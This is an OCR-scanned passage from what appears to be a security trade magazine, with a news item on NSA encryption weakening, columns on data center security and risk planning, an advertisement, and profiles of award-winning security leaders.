munications  online,  it’s  incredibly  destruc¬ 
tive  for  the  NSA  to  add  flaws  to  such  critical 
infrastructure,”  he  says.  “The  NSA  seems  to  be 
operating  on  the  fantastically  naive  assump¬ 
tion  that  any  vulnerabilities  it  builds  into  core 
Internet  technologies  can  only  be  exploited  by 
itself  and  its  global  partners.” 

The  recent  New  York  Times  story,  citing  a 


Guardian  report  from  July,  says  Microsoft  has 
worked  with  the  NSA  to  provide  the  agency 
with  pre-encryption  access  to  Outlook,  Skype 
and  other  products.  Microsoft  has  repeat¬ 
edly  denied  helping  the  NSA  break  encryp¬ 
tion  on  its  products.  A  spokeswoman  says  the 
company  complies  with  legal  court  orders  for 
information  on  its  customers  and  will  provide 
agencies  with  unencrypted  cus¬ 
tomer  information  if  ordered  by  a 
court  to  do  so. 

Hall  defends  Microsoft’s  ap¬ 
proach.  “It  seems  pretty  clear  that 
Microsoft  is  legally  compelled  to 
do  this  and  would  not  otherwise 
do  it  voluntarily,”  he  says. 

But  Matthew  Green,  a  cryp¬ 
tographer  and  research  professor 
at  Johns  Hopkins  University,  says 
Microsoft  deserves  scrutiny  on 
encryption  security.  Most  com¬ 
mercial  encryption  uses  a  small 
number  of  libraries,  with  Microsoft 
CryptoAPI  being  among  the  most 
common,  he  wrote  in  a  blog  post. 

“While  Microsoft  employs 
good  (and  paranoid!)  people 
to  vet  their  algorithms,  their 
ecosystem  is  obviously  deeply 
closed-source,”  Green  wrote.  “You 
can  view  Microsoft's  code  (if  you 
sign  enough  licensing  agreements)  but  you’ll 
never  build  it  yourself.  Moreover  they  have 
the  market  share.  If  any  commercial  vendor 
is  weakening  encryption  systems,  Microsoft  is 
probably  the  most  likely  suspect.” 

Microsoft  Internet  Information  Services 
runs  on  about  20  percent  of  the  Web’s  serv¬ 
ers,  and  nearly  40  percent  of  the  SSL  servers, 
while  third-party  encryption  programs  running 
on  Windows  depend  on  Microsoft  APIs,  Green 
wrote.  “That  makes  these  programs  some¬ 
what  dependent  on  Microsoft’s  honesty.” 

-Grant  Gross 
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CSO  Forum  on  Linked  0 


Share  best  practices  and  insight 
and  discuss  your  challenges  with 
your  security  executive  peers. 

The  CSO  Forum  is  where  members  of  the  security 
community  can  connect  and  collaborate  to  move  their 
security  and  technology  initiatives  and  careers  forward. 

If  you  are  a  senior  security  or  IT  professional,  we’d  love 
to  have  you  join— apply  for  membership  today. 

Visit  linkedin.com  click  Groups  and  search  for  "CSO  Forum” 

Facilitated  by  CSOOnline.com  and  CSO  Magazine 
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Three  Habits  of  Effective 
Data  Center  Protection  Teams 

How  good  security  teams  keep  up  with  evolving  technology  while  ensuring  everything 
runs  smoothly  by  evelyn  de  souza 


NOW  THAT  SUMMER’S  OVER  AND 
work  is  in  full  swing  again,  it’s  time  to  reflect 
on  how  to  move  data  center  security  forward 
to  keep  pace  with  new  technology  and  work¬ 
force  trends. 

Habit  1:  Embrace  the 
need  for  real-time  services 
and  transactions. 

Web  2.0  has  taken  over  everything,  and  as  a 
result,  businesses  and  consumers  alike  have 
come  to  expect  information  and  services  to 
be  delivered  in  real  time.  The  challenge  is  for 
security  teams  to  balance  these  demands  for 
instant  adaptations  without  placing  company 
assets  at  risk.  To  achieve  this,  businesses  must 
choose  technologies  that  can  scale  as  net¬ 
work  architectures  become  faster,  flatter  and 
much  more  automated.  Additionally,  data 
center  solutions  must  be  able  to  address  both 
private  and  public  cloud  adoption,  as  well  as 
the  convergence  between  security  and  net¬ 
working  teams  that  is  currently  underway  at 
many  companies. 

The  answer  will  be  in  adopting  flexible 
toolsets  and  template-driven  processes  that 
map  to  team  functions.  Look  for  tools  that 
allow  policy  to  be  abstracted  from  the  net¬ 
work  and  applied  across  different  topologies 
beyond  the  traditional  enterprise  perimeter. 
Enabling  the  network,  server  operations  and 
security  teams  to  work  in  tandem  to  provision 
services  speedily  will  also  be  key. 


Habit  2:  Don’t  let  your 
security  solutions  negatively 
affect  performance. 

Does  it  ever  seem  like  some  data  center  teams 
treat  security  like  the  unwanted  child?  His¬ 
torically,  it’s  been  because  security  has  either 
eroded  performance  and  infrastructure  effi¬ 
ciency  gains,  or  because  it  required  burden¬ 
some  infrastructure  retrofits. 

To  counteract  this  attitude,  now  is  the 
time  to  evaluate  the  impact  of  your  security 
toolsets  on  data-center  performance.  In  a 
recent  Cisco-sponsored  Network  World  study, 
73  percent  of  respondents  did  not  feel  confi¬ 
dent  that  their  current  firewall  or  intrusion- 


prevention  system  could  satisfy  today’s 
increased  performance  requirements.  So  with 
this  in  mind,  take  this  window  of  opportunity 
to  adopt  platforms  that  can  help  overcome 
this  problem. 

Select  a  platform  that  has  been  designed 
not  only  to  ensure  high  throughput,  but  also 
to  maximize  availability  and  ensure  optimal 
traffic  flows.  Use  clustering  and  a  pay-as-you- 
go  model  to  maximize  hardware  investments. 

Habit  3:  Keep  protection 
focused  on  what  matters 
most:  users  and  data. 

Security  teams  remain  in  denial  about  cloud 
and  mobility  trends.  The  reality  is  that  key 
parts  of  the  infrastructure  are  increasingly  out 
of  security’s  control.  Therefore,  it’s  important 
to  ensure  a  contextual  approach:  Focus  on 
who,  what,  when  and  where  so  you  can  en¬ 
able  users  to  safely  access  data. 

Also,  as  threats  continue  to  evolve,  consult 
cloud-based  threat  data  to  find  much-needed 
supplemental  information  that  will  be  es¬ 
sential  to  making  accurate  security  decisions. 
Many  teams  find  that  cloud  threat  data  helps 
provide  a  level  of  confidence  in  moving  to 
cloud-based  infrastructure  models  where  they 
are  likely  to  have  a  limited  degree  of  visibility 
and  control. 


■  Evelyn  de  Souza  is  a  data  center  and 
cloud  security  strategist  for  Cisco  Systems. 
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Thinkstock 


Stop  Hyping  Threats  and  Start  Creating  Solutions 


I  RECENTLY  CHAIRED  A  PANEL  ON  CYBERTHREATS  FOR  A 
local  business  council.  I  had  great  panelists  giving  details  on  sophis¬ 
ticated  attacks  found  in  their  companies'  threat  reports,  along  with 
words  from  the  National  Institute  of  Standards  and  Technology  on  the 
security  framework  effort  triggered  by  President  Obama's  executive 
order  on  cybersecurity.  But  when  I  opened  it  up  for  questions,  most  of 
the  audience  did  not  ask  about  the  threats  discussed,  instead  having 
reactions  along  the  lines  of,  “OK,  that’s  nice,  but  what  solutions  have 
you  seen  that  worked  against  these  things,  and  how  do  we  convince 
management  they  need  to  fund  us  to  do  something?” 

The  audience  had  a  very  CEO-like 
response.  While  the  security  com¬ 
munity  clings  to  the  belief  that  man¬ 
agement  just  doesn’t  understand 
cyberthreats  or  risk,  the  reality  is  that 
most  CEOs  have  been  bombarded 
with  apocalyptic  cyberthreat  reports 
from  business  publications  and  the 
mainstream  media-and  from  their 
own  security  teams.  Most  really  do 
weigh  those  risks,  using  the  same 
formal  or  informal  thinking  they  use 
to  judge  the  risk  of  investing  in  a  new 
product,  or  doing  a  merger  or  acquisi¬ 
tion.  The  real  leaps  forward  are  not 
made  by  convincing  management 
about  threats  or  risk,  they  are  made 
by  showing  them  solutions  to  the 
problems  that  are  less  disruptive  and 
less  expensive  than  doing  nothing. 

Successful  business  leaders  usually  make  their  decisions  based  on 
their  judgment  about  opportunity  costs:  If  I  spend  the  money  here,  how 
will  that  disrupt  my  business  by  depriving  funding  from  some  other 
area  of  business  or  investment? 

That  captures  where  we  are  today  in  security;  we  don’t  need  to  keep 
flogging  the  threat,  we  need  to  be  able  to  demonstrate  solutions  that 
work  and  that  don’t  disrupt  the  busines.  To  a  CEO,  slowing  down  busi¬ 
ness  so  it  hurts  less  when  bad  things  happen  is  riskier  than  doing  noth¬ 
ing.  What  security  needs  is  less,  “It  hurts  when  we  do  this,”  and  more, 
"Instead  of  doing  this,  we  are  going  to  do  that.” 

A  few  examples  of  poor  strategies: 

■  BYOD  solutions  that  propose  back-to-the-mainframe  approaches 
like  making  users  deal  with  dumb  terminal  apps  or  completely  lock¬ 
ing  down  smartphones  or  tablets. 

■  The  government  trying  to  force  government  employees  to  use  Smart 
Cards  (remember  those?)  for  authentication  on  mobile  devices 


■  Continuing  to  give  users  and  admins  full  ability  to  load  any  execut¬ 
able,  even  though  99  percent  of  what  they  need  can  be  found  on 
widely  available  whitetists. 

■  Allowing  Web  apps  to  continue  to  include  command  injection  vul¬ 
nerabilities  even  though  99  percent  of  them  could  be  easily  found 
and  fixed  during  final  QA. 

There  are  success  stories  out  there,  where  CISOs  led  or  supported  the 
development  of  solutions  that  met  demand  to  use  personally  owned 
devices  without  increasing  risk,  or  decreased  vulnerabilities  in  software, 
or  quickly  detected  advanced  targeted  attacks  in  time  to  prevent  them 

from  affecting  the  business-all 
without  requesting  new  funding  or 
altering  business  processes.  Those 
CISOs  focused  on  change,  on  doing 
something  differently  and  better  to 
improve  security  without  having  to 
restrain  business  or  try  to  make  man¬ 
agement  understand  the  threat. 

In  my  13  years  in  security  research, 
I’ve  yet  to  see  a  risk-management  or 
ROI  argument  that  was  the  catalyst 
for  leaps  forward  in  security.  Most 
leaps  were  made  by  security  manag¬ 
ers  who  didn’t  need  new  funds  to  get 
started.  They  tried  new  approaches 
to  intrusion  prevention,  pen  testing, 
application  security,  BYOD  and  desk¬ 
top  security,  replacing  the  old  way 
with  a  new  way  to  demonstrate  it 
solved  a  problem.  Then  they  easily  got  funding  for  full  scale  roll-out. 

I’ll  leave  you  with  my  version  of  Aesop’s  fable  “The  Ant  and  the 
Grasshopper”:  The  security  ant  was  busy  replacing  old  firewalls  and 
intrusion-prevention  systems  with  advanced  threat  detection,  checking 
Web  code  for  vulnerabilities  before  deploying  and  using  whitelisting  on 
all  servers  to  prevent  malware.  The  security  grasshopper  was  busy  sing¬ 
ing  the  "Song  o’  Threats"  and  creating  risk  dashboards  that  he  was  sure 
would  make  the  board  of  directors  finally  get  it,  and  laughed  at  the 
toiling  ant-until  the  attack  hit  that  stole  all  the  wheat  the  grasshop¬ 
per  had  planned  to  eat  later.  The  ant’s  firm  survived  the  attack,  made  it 
through  the  winter  and  into  a  very  prosperous  spring.  The  grasshopper 
had  to  call  in  expensive  incident  response  and  public  relations  consul¬ 
tants,  notify  thousands  of  customers  that  their  personal  information 
had  been  exposed,  and  spent  all  spring  staring  at  compliance  reports. 

Be  an  industrious  security  ant,  not  a  singing  security  grasshopper. 


John  Pescatore  is  director  of  emerging  security  trends  at  SANS. 
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Risk 


A  Real-World  Approach  to  Risk-Based  Planning 


IT  CAN  BE  ALL  TOO  EASY  TO  DEPLOY 
security  technology  and  think  you’ve  mitigat¬ 
ed  risk  to  your  business,  but  sadly  technology 
investment  alone  is  no  guarantee  of  protec¬ 
tion  against  the  latest  threats. 

A  global  study  by  the  Ponemon  Institute 
indicates  that  despite  serious  business  invest¬ 
ment  in  modern  security  equipment,  there 
was  still  a  58  percent  year-over-year  increase 
in  malware  incidents  last  year,  with  the  aver¬ 
age  cost  of  a  cyberattack  totalling  a  whop¬ 
ping  $6.1  million.  And  according  to  a  recent 
report  by  the  Department  for 
Business,  Innovation  and  Skills 
in  the  U.K.,  87  percent  of  small 
businesses  and  93  percent  of 
large  organizations  experi¬ 
enced  at  least  some  form  of 
security  breach  in  the  past 
year,  while  the  cost  of  cyber 
breaches  against  those  busi¬ 
nesses  has  tripled  over  that 
same  year. 

To  truly  improve  data  se¬ 
curity,  every  business  must 
first  consider  a  few  key  things: 

What  are  you  protecting? 

What  is  it  worth  to  you?  What  are  you  pro¬ 
tecting  it  against?  What  are  the  consequenc¬ 
es  of  failure?  These  questions  also  need  to  be 
asked  repeatedly  and  regularly  to  accom¬ 
modate  the  shifting  demands  of  employees, 
customers  and  other  stakeholders,  as  well  as 
evolving  compliance  standards. 

The  modern  data  security  challenge  is 
made  even  more  complex  by  employees  ac¬ 
cessing  company  resources  internally  and 
externally  by  whatever  means  are  at  hand, 
including  untrusted  cloud  platforms  and 
personal  devices.  While  rarely  intentionally 
malicious,  these  actions  add  identity-man¬ 
agement  and  user-authentication  problems 
to  a  threat  list  that  already  includes  data 
loss,  malware,  exploits  and  hackers.  These 
multi-layered  challenges  can  only  be  met  with 
a  blend  of  technology,  consultancy,  commit¬ 


ment  and  a  genuine  willingness  to  adapt. 

Businesses,  however  large  and  established, 
should  never  be  reluctant  to  turn  to  external 
partners  for  help  maintaining  robust  data  pro¬ 
tection,  addressing  industry  compliance  issues 
and  establishing  a  practical  security  strategy. 
Although  integrity  is  always  paramount,  many 
large  organizations  simply  cannot  afford  to 
take  their  eye  off  their  core  business  goals, 
and  their  internal  resources  often  do  not  have 
time  to  develop  a  practical  approach  to  re¬ 
solving  information  security  challenges. 


In  the  real  world,  it’s  OK  to  ask  for  help  to 
resolve  complex  security,  risk  and  compliance 
issues.  Often  third-party  insight  from  consul¬ 
tants  is  critical  to  developing  a  complete  end- 
to-end  solution  that  is  relevant  and  scalable, 
meets  an  individual  business’s  specific  objec¬ 
tives,  and  doesn’t  merely  address  generic  is¬ 
sues  or  push  individual  security  components. 
Specialized  consultants  who  constantly  moni¬ 
tor  the  latest  threats  and  have  worked  with 
a  range  of  firms  and  tackled  diverse  security 
challenges  should  always  be  able  to  embed 
themselves  with  internal  experts  and  become 
integral  members  of  an  information  security 
team.  Sometimes  a  business  needs  that  extra 
layer  of  expert  advice  to  gain  the  confidence  it 
needs  to  make  security  decisions  at  business, 
management  and  operational  levels. 

Data  security  concerns  span  every  vertical 


sector,  and  all  IT  managers  must  continue  to 
mitigate  these  issues  by  taking  the  smart¬ 
est  precautions  they  can  to  strike  a  balance 
between  security,  productivity  and  cost.  A 
resilient,  customized  plan  should  take  into  ac¬ 
count  perimeter  security,  intrusion  detection 
and  prevention,  content  security,  authentica¬ 
tion  services  and  Web  application  security.  But 
perhaps  just  as  important  is  establishing  a 
clear  methodology.  Improved  visibility  enables 
any  organization  to  make  more  informed 
investment  decisions.  Greater  efficiency  in 
meeting  a  unique  set  of  data 
security  challenges  helps  to 
optimize  the  use  of  available 
resources.  Greater  understand¬ 
ing  of  threats  and  the  best 
actions  to  combat  them  helps 
balance  risk  management  with 
commercial  goals.  A  broader 
skill  set  and  knowledge  base 
gained  from  consulting  an  ex¬ 
pert  partner  can  help  employ¬ 
ees  work  more  confidently  and 
understand  new  technologies. 
Finally,  tangible  improvements 
and  measurable  successes  lead 
directly  to  industry  compliance  with  less  work, 
meaning  that  standards  and  regulatory  needs 
are  met  without  pain  and  stress. 

A  thoroughly  planned,  practical  security 
strategy  will  always  improve  protection  levels 
while  reducing  costs.  Businesses  must  take  a 
risk-based  approach:  develop  objective  se¬ 
curity  plans  that  are  prioritized  and  action¬ 
able:  gain  a  better  understanding  of  actual 
risks,  costs  and  benefits;  and  then  invest  time, 
money  and  effort  primarily  in  the  areas  of 
greatest  value. 

Achieving  this  demands  cultural  change, 
collaboration  and  measured  partnerships,  not 
just  a  stack  of  sophisticated  security  equip¬ 
ment.  But  the  rewards  couldn't  be  higher. 

■  Chris  Camejo  directs  assessment  services 
at  security  consultancy  Integralis. 
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Brains, 
and  beauty 

Intelligent,  stylish  access 
control  with  WiFi 

It's  love  at  first  sight  with  the  INI  20  WiFi  lock  from  ASSA  ABLOY  Group  brands 
CORBIN  RUSSWIN  and  SARGENT.  Facility  managers  are  fans  of  how  it  reduces 
installation  time  and  lets  them  add  access  control  at  a  fraction  of  the  cost. 
Architects  like  having  a  variety  of  finishes  and  levers  to  match  any  environment 
seamlessly.  IT  executives  appreciate  its  compatibility  with  existing  and  evolving 
WiFi  systems  and  standards.  Looking  to  settle  down  with  a  security  solution? 
The  INtelligent,  INnovative  and  INspiring  INI  20  could  be  The  One. 
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CAREER 


Forging  Ahead:  How  Five 
All-Stars  Get  Stuff  Done 

Each  of  our  2013  CSO  Compass  Award  winners  adapts  to  the  demands  of 
their  environment  and  finds  a  way  to  transform  security  BY  LAUREN  GIBBONS  PAUL 


Kim  Keever 

The  Doer 

VP  of  information  security 
and  controls  at  Coca-Cola, 
Keever  uses  her  CIO 
experience  and  business 
contacts  to  get  things  done 


FOR  KIM  KEEVER,  SECURITY  KNOWL- 
edge  (no  matter  how  thorough)  is  not  enough. 
Vice  president  of  information  security  and  con¬ 
trols  for  Coca-Cola,  Keever  and  her  team  of  60 
security  staffers  have  the  expertise  to  implement 
security  technology  and  practices  in  addition  to 
evangelizing  security  awareness. 

To  Keever,  this  is  a  key  distinction.  Some  secu¬ 
rity  groups  are  set  up  as  subject-matter  experts 
for  the  rest  of  the  organization,  advising  on  what 
to  do  and  remaining  silent  on  how  to  do  it.  Keever 
believes  this  approach  undermines  credibility. 
"You  can't  just  be  a  security  specialist.  You  have 
to  understand  how  to  get  things  done  in  the  IT 
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space.  I  could  not  just  pick  technology  and 
hand  it  over  to  another  group  in  IT  to  imple¬ 
ment  it,”  she  says. 

Given  her  background,  it’s  unlikely  Keever 
would  ever  take  a  backseat  approach  to  any 
aspect  of  security.  She  began  her  career  as 
an  IT  consultant  in  the  mutual  fund  industry, 
specializing  in  cross-functional  team  man¬ 
agement  and  disaster  recovery  and  business 
continuity.  This  led  to  a  post  as  CIO  for  In- 
vesco's  retirement  group  back  in  Atlanta,  her 
hometown. 

“I  focused  on  all  aspects  of  IT  but  had  a 
special  interest  in  ensuring  controls  were  in 
place  in  environments  leading  to  a  focus  in 
security  tools  and  audit  practices,"  she  says. 
When  Invesco’s  retirement  group  was  sold  off, 
Keever  seized  the  opportunity  to  spend  a  few 
years  at  home  with  her  young  children. 

In  2009,  she  was  recruited  to  enhance 
controls  for  Atlanta’s  Coca-Cola  Enterprises 
(CCE),  then  the  largest  bottler  in  the  Coke 
system.  There,  Keever  led  an  effort  to  enhance 
access  controls,  and  role  was  seen  as  impor¬ 
tant  when  Coca-Cola  moved  to  acquire  CCE’s 
North  American  operations,  which  became 
Coca-Cola  Refreshments  (CCR)  in  2010. 

“They  wanted  to  focus  on  aligning  security 
with  the  Coca-Cola  Company  standards  in  this 
North  American  business  unit,”  she  says. 


Following  the  acquisition,  CCR’s  risk  pos¬ 
ture  changed  because  it  was  now  connected 
to  its  parent  company’s  environment.  “Things 
had  to  be  modified  quickly.  We  had  the  added 
pressure  of  needing  to  align  with  a  global 
company  that  had  a  different  set  of  security 
standards,”  she  says. 

Keever  moved  quickly  to  build  her  team, 
which  she  sourced  both  internally  and  exter¬ 


nally.  “I  have  a  diverse  group  of  people  who 
had  systems  implementation  experience, 
people  that  come  from  IT  audit,  and  people 
that  worked  at  the  security  vendors.  My  team 
is  security-focused  but  business-minded  and 
knows  how  to  get  things  done.” 

One  of  her  team’s  first  initiatives  was 
implementing  a  role-based  identity-  and 
access-management  security  infrastructure 
that  allowed  employees  to  serve  themselves 
in  many  cases.  For  example,  new  hires  are  au¬ 
tomatically  provisioned  and  receive  network 


access  without  having  to  go  through  the  typi¬ 
cal  paperwork  and  manual  processing.  At  the 
same  time,  Keever  worked  to  simplify  compli¬ 
ance  with  security  practices  for  employees 
by  easing  password  management  by  using  a 
cross-company  password-management  tool 
and  a  federation  platform. 

Since  2010,  Keever’s  team  has  delivered 
significant  business  value  and  reduced  risk 


through  a  number  of  security  initia¬ 
tives,  including  raising  security  visibility 
and  awareness,  and  implementing  the 
first  out-of-region  disaster  recovery 
capability  for  the  North  American  en¬ 
vironment.  Keever  also  spearheaded 
development  of  a  program  to  partner 
with  audit  and  IT  owners  to  develop 
root-cause  resolution  of  audit  findings. 

Lately,  she’s  been  focused  on  com¬ 
pliance  with  payment  card  industry 
(PCI)  regulations.  She  developed  a 
center  of  excellence  to  serve  as  a  cen¬ 
tralized  resource  for  this  key  area.  The 
team  evaluated  compliance  and  medi¬ 
ated  issues  for  PCI-relevant  processes 
in  the  North  American  business  as  part 
of  preparations  for  attaining  tier  one 
vendor  status  this  year. 

Keever’s  accomplishments  are  impressive, 
even  more  so  given  that  they  took  place  dur¬ 
ing  a  tumultuous  time  in  her  personal  life.  In 
2011,  both  of  her  hitherto  vibrant  parents  got 
sick  and  died,  one  after  the  other.  Work  pro¬ 
vided  a  much-needed  distraction  during  that 
time,  she  says. 

Understanding  the  business-its  threat 
profile,  drivers  and  objectives-helps  Keever 
when  discussing  funding  needs  for  key  secu¬ 
rity  initiatives.  “From  a  funding  perspective,  it 
is  easier  for  me  to  make  a  case  because  I  focus 
on  value  to  the  business,”  she  says. 

That  is  right  in  line  with  her  belief  that  se¬ 
curity  people  should  be  doers  rather  than  just 
advisers.  Having  seen  both  ways  of  operating 
an  information  security  organization,  Keever 
comes  down  strongly  in  favor  of  her  team  im¬ 
plementing  security  technology  as  opposed  to 
just  advising  the  business  and  IT  on  security 
matters.  “Your  business  can’t  afford  to  have  a 
team  of  subject-matter  experts  telling  people 
what  to  do  from  a  security  perspective.  You 
have  to  have  them  doing  things  and  showing 
value,”  she  says. 

“I  feel  very  fortunate.  Coca-Cola  is  a  great 
company.  It  is  really  exciting  with  so  much  op¬ 
portunity  to  succeed.  It’s  very  focused  on  di¬ 
versity,  women,  accepting  of  different  needs, 
enabling  a  flexible  lifestyle,"  says  Keever.  “It’s 
been  very  rewarding  for  me.” 


“You  can’t  just  be  a  security 
specialist.  You  have  to 
understand  how  to  get  things 
done  in  the  IT  space.” 
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Grant  Lecky  The  Visionary 

Founder  of  the  Canadian  Security  Partners’  Forum,  Lecky  went  after  his 
dream  of  elevating  the  security  industry  while  keeping  his  day  job 


WHEN  GRANT  LECKY  HAS  A 
dream,  he  doesn't  sit  around  and  wait  for 
someone  else  to  make  it  come  true.  In¬ 
stead,  he  does  whatever  it  takes  to  make 
that  vision  a  reality. 

Case  in  point:  In  2010,  Lecky  was  finish¬ 
ing  a  master’s  degree  in  security  and  risk 
management  at  the  University  of  Leices¬ 
ter.  He  got  to  asking  why  security  is  not 
considered  a  true  profession  in  the  busi¬ 
ness  world  and  what  would  have  to  hap¬ 
pen  to  elevate  its  status  in  Canada. 

"I  kept  hearing  that  the  industry  is  frag¬ 
mented.  People  don't  know  how  to  find 
other  experts  in  security  in  Canada,”  says 
Lecky.  “There  was  no  means  to  connect 
people.  There  was  no  body  of  knowledge.” 
The  problem  was  exacerbated  by  a  poor 
economy,  the  large  distances  between 
many  Canadian  cities  and  the  relatively 
low  population  density. 

The  solution,  Lecky  believed,  was  not 
to  create  another  industry  association- 
there  were  already  so  many  of  those,  and 
they  were  generally  ineffective.  Instead, 
he  envisioned  a  new  kind  of  organization, 
a  partner  to  security  associations  and  profes¬ 
sionals,  that  would  form  an  agile  network  for 
sharing  best  practices  and  other  information, 
and  he  made  it  happen  surprisingly  quickly. 

After  finishing  grad  school  and  while  work¬ 
ing  as  the  departmental  coordinator  for  busi¬ 
ness  continuity  and  emergency  management 
at  Citizenship  and  Immigration  Canada,  Lecky 
founded  the  Canadian  Security  Partners' 
Forum  (CSPF)  in  2011.  His  colleague  Bonnie 
Butlin  was  at  his  side  and  instrumental  in  the 
launch,  he  says. 

Roughly  a  year  after  its  birth,  the  organiza¬ 
tion  already  had  80  association  members: 
now  it  has  119.  A  nonprofit,  the  CSPF  does  not 
charge  a  fee  for  participation,  and  gets  all  of 


“If  we  have  a  resource  to 
tap  into  to  develop  a  bet¬ 
ter  understanding  of  the 
risks  we  face,  we  become 
more  resilient  individuals. 

its  small  budget  from  sponsorships. 

“We’re  a  friend  to  the  associations,"  says 
Lecky.  “In  some  cases,  we  are  a  magnifier  for 
them.  People  have  their  associations,  but  they 
also  have  the  forum  to  tap  into  and  share 
best  practices.  It’s  about  cross  pollination 
and  making  security  [and]  public  safety  more 
professional.”  In  his  day  job,  Lecky  evaluates 
security  risk  management,  including  hazards- 
related  risks  and  business-disruption  risks.  “In 
my  role,  I  have  to  build  resilience  for  the  or¬ 
ganization.  The  way  to  do  that  is  break  down 
silos  and  share  information,”  he  says. 

Being  part  of  the  forum  makes  people 
more  resilient  professionals.  “If  we  have  a 
resource  to  tap  into  to  develop  a  better  under¬ 


standing  of  the  risks  we  face,  we  become 
more  resilient  individuals.  The  forum  is  a 
resilient  entity  thanks  to  its  community  of 
best  practices,"  he  says. 

In  a  country  with  33  million  citizens, 
the  number  of  security  professionals  likely 
totals  in  the  hundreds  of  thousands.  “The 
amount  of  information  that  can  be  shared 
is  just  unbelievable.  Information  and  best 
practices  can  help  them  see  different 
views  and  make  different  decisions,”  says 
Lecky,  who  estimates  the  CSPF  has  the 
ability  to  reach  out  to  millions  of  people 
all  over  the  world  in  a  matter  of  minutes 
via  its  email  list,  Linkedln  groups  and  as¬ 
sociation  Facebook  pages. 

The  CSPF  is  busily  launching  programs 
and  events,  including  a  Cybersecurity  for 
Executives  lecture  series  designed  to  raise 
security  awareness.  The  group  is  also  now 
working  with  its  association  members  to 
develop  a  framework  for  dialog  across 
security-related  fields,  including  business 
continuity,  emergency  management,  risk 
management,  critical  infrastructure  pro¬ 
tection,  defense  and  intelligence. 

Thanks  to  its  fast  start,  the  CSPF  is  now 
getting  a  lot  of  attention  from  security  profes¬ 
sionals  in  other  countries  who  are  interested 
in  following  suit.  “I'm  seeing  other  countries 
following  our  example  or  adopting  a  variation 
of  what  we're  doing,”  says  Lecky.  Australia, 
for  example,  is  working  on  creating  a  security 
alliance. 

Work  on  the  CSPF  might  seem  burdensome 
for  someone,  even  without  the  additional 
weight  of  another  full-time  position  and  with¬ 
out  the  prospect  of  greater  fortune.  “I  don’t 
like  being  bored,”  says  Lecky.  “The  reward  right 
now  is  a  job  well  done.  I’m  furiously  stubborn. 
If  there's  something  I  feel  needs  to  be  done,  I 
will  just  go  and  do  it." 
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Scott  Pettigrew  The  Builder 

Over  the  course  of  his  eclectic  career,  Pettigrew,  who’s  now  CSO  at  HMS, 
has  assembled  three  security  departments  from  the  ground  up 


IF  SOMEONE  HAD  TOLD  SCOTT 
Pettigrew  20  years  ago  when  he  was  first 
starting  out  that  he  would  go  on  to  build 
complete  security  organizations  for  three 
different  large  companies,  he  might  have 
just  taken  a  nap.  Instead  at  this  point  in 
his  career,  Pettigrew  finds  himself  the 
architect  of  security  programs  for  no  less 
than  Tandy  Corp.,  American  Airlines  and 
his  current  employer,  HMS-an  achieve¬ 
ment  of  which  he  rightly  proud. 

Pettigrew’s  security  career  began  in 
1994,  when  he  was  asked  to  run  security 
at  Tandy  Corp.,  a  family-owned  leather 
goods  company.  “Security  wasn’t  such 
a  developed  area  back  then,”  says  Pet¬ 
tigrew,  now  vice  president  and  CSO  for 
HMS,  a  cost-containment  firm  that  serves 
the  healthcare  industry.  "There  wasn't  the 
focus  on  security  then  that  there  is  now.  It 
was  much  harder  to  get  things  done,  get  bud¬ 
get.”  A  lot  of  the  focus  then  was  on  basic  user 
administration.  Let's  just  say  the  world  has 
grown  much  more  complex. 

After  a  stint  providing  security  advice  for 
management  consultancy  Ernst  and  Young, 
Pettigrew  was  lured  to  head  security  for 
American  Airlines  in  2000,  where  there  was  a 
lot  of  tumult  even  before  9/11.  "That  was  right 
when  they  were  splitting  from  SABRE  and  just 
starting  to  hire  IT  staff,”  he  says. 

As  for  security,  the  airline  was  lacking. 
Pettigrew  had  carte  blanche  developing  the 
program.  "They  had  so  many  problems  on  the 
IT  security  side  the  auditors  said  it  was  going 
to  have  to  be  a  footnote  on  our  next  financial 
statement.  So  there  was  a  lot  of  work  to  do  at 
that  point,”  he  recalls. 

And  then  hijackers  struck  two  American 
Airlines  flights,  along  with  a  United  flight, 
throwing  the  airline,  the  industry  and  the 
economy  into  turmoil.  “We  were  implement¬ 


ing  a  security  architecture  [when]  9/11  hit  and 
everything  went  crazy  for  the  next  year,"  says 
Pettigrew.  “I  worked  more  in  that  year  and  a 
half  than  I  ever  had  before.”  He  worked  with 
the  FBI  during  that  time,  and  he’s  still  sitting 
on  stockpiles  of  information  that  he  can’t  talk 
about  thanks  to  a  nondisclosure  agreement. 

After  that,  there  was  a  much  greater  em¬ 
phasis  on  security,  both  at  American  and 
throughout  the  industry.  “Internal  controls  be¬ 
came  crucial,  and  understanding  patterns  and 
data  mining  pretty  much  started  then,”  he 
says.  Pettigrew  remained  for  a  year  and  a  half 
after  9/11,  but  then  he  needed  a  break.  “I  just 
had  to  get  away  from  that  for  a  while.” 

He  opened  his  own  security  consulting 
firm,  but  "it  wasn’t  as  easy  as  I  thought  it 
would  be."  In  2004,  he  was  asked  to  create 
the  security  function  from  the  ground  up  for 
Baylor  Health  Care  System,  which  gave  him  an 
understanding  of  healthcare.  Four  years  later, 
with  Baylor’s  security  program  in  good  shape, 
Pettigrew  was  asked  yet  again  to  build  a  secu¬ 
rity  organization,  this  time  for  HMS. 


His  reaction?  “Oh  my  God,  here  I  go 
again,”  he  says  with  a  small  chuckle.  “But 
I  realized  those  opportunities  don’t  really 
come  along  all  the  time.”  At  HMS,  “I  had 
one  person  for  more  than  a  year;  now  we 
will  have  21  people  at  the  end  of  this  year” 
protecting  2,500  employees,  he  says,  add¬ 
ing  that  finding  good  people  with  the  right 
mix  of  technical  and  business  skills  is  the 
most  difficult  part  of  his  job. 

Besides  building  up  his  staff,  Pettigrew 
has  excelled  at  working  with  a  corporate 
culture  that  was  less  than  welcoming  to 
change  in  general  and  security  in  particu¬ 
lar.  “This  started  as  a  very  small  company. 
Over  the  last  five  years,  it  has  grown  expo¬ 
nentially,”  he  says. 

When  he  joined  in  2008,  the  culture 
was  like  the  Wild  West,  with  virtually  no 
controls.  Many  employees  had  been  at  the 
company  forever  and  were  not  inclined  to 
change.  Pettigrew’s  right-hand  man  (and 
first  security  hire)  George  Macrelli,  director  of 
security  assurance,  says  his  boss  succeeded  in 
establishing  early  on  why  it  was  critical  for  the 
company  to  change  its  ways. 

At  the  same  time,  Pettigrew  managed  to 
move  the  culture  without  being  dictatorial. 

CIO  Cynthia  Nustad  says,  “There  are  many  se¬ 
curity  officers  who  have  more  of  a  cop-like  or 
military  sense  of  security.  That  persona  might 
work  great  for  certain  types  of  businesses 
but  may  not  work  well  in  our  industry.  We  are 
much  more  focused  on  finding  the  right  bal¬ 
